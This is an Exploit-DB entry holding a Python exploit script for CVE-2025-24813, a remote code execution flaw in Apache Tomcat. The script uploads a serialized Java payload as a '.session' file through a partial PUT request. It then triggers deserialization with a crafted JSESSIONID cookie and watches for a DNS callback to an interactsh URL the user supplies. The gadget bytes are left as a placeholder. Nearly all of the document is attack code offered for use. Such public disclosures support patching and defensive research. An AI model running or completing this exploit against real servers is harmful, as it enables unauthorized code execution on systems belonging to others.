Apache Tomcat 11.0.3 - Remote Code Execution

EDB-ID:

52134




Platform:

Multiple

Date:

2025-04-07


# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
# Exploit Author: Al Baradi Joy
# CVE: CVE-2025-24813
# Date: 2025-04-06
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-90.cgi
# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
# Tested on: Apache Tomcat 10.1.33
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-44, CWE-502
# Reference:
https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html

import requests
import random
import string
import sys

def rand_filename(length=6):
    return ''.join(random.choices(string.ascii_lowercase, k=length))

def generate_payload(interact_url):
    # Java serialized payload gadget triggering DNS interaction
    return f'\xac\xed\x00\x05...'  # Replace with actual gadget bytes or
generator

def exploit(target, interact_url):
    filename = rand_filename()
    put_url = f"{target}/{filename}.session"
    get_url = f"{target}/{filename}"
    headers = {
        "Content-Range": "bytes 0-452/457",
        "Content-Type": "application/octet-stream"
    }
    payload = generate_payload(interact_url)

    print("[+] Exploit for CVE-2025-24813")
    print("[+] Made By Al Baradi Joy\n")
    print(f"[+] Uploading payload to: {put_url}")
    r1 = requests.put(put_url, data=payload, headers=headers)
    if r1.status_code == 201:
        print("[+] Payload uploaded successfully.")
    else:
        print(f"[-] Upload failed with status: {r1.status_code}")
        return

    print(f"[+] Triggering payload via: {get_url}")
    cookies = {"JSESSIONID": f".{filename}"}
    r2 = requests.get(get_url, cookies=cookies)
    print(f"[+] Trigger request sent. Check for DNS callback to:
{interact_url}")

if __name__ == "__main__":
    # Display banner first
    print("[+] Exploit for CVE-2025-24813")
    print("[+] Made By Al Baradi Joy\n")

    # Ask the user for the target domain and interact URL
    target_url = input("Enter the target domain (e.g., http://localhost:8080):
")
    interact_url = input("Enter your interactsh URL: ")

    exploit(target_url, interact_url)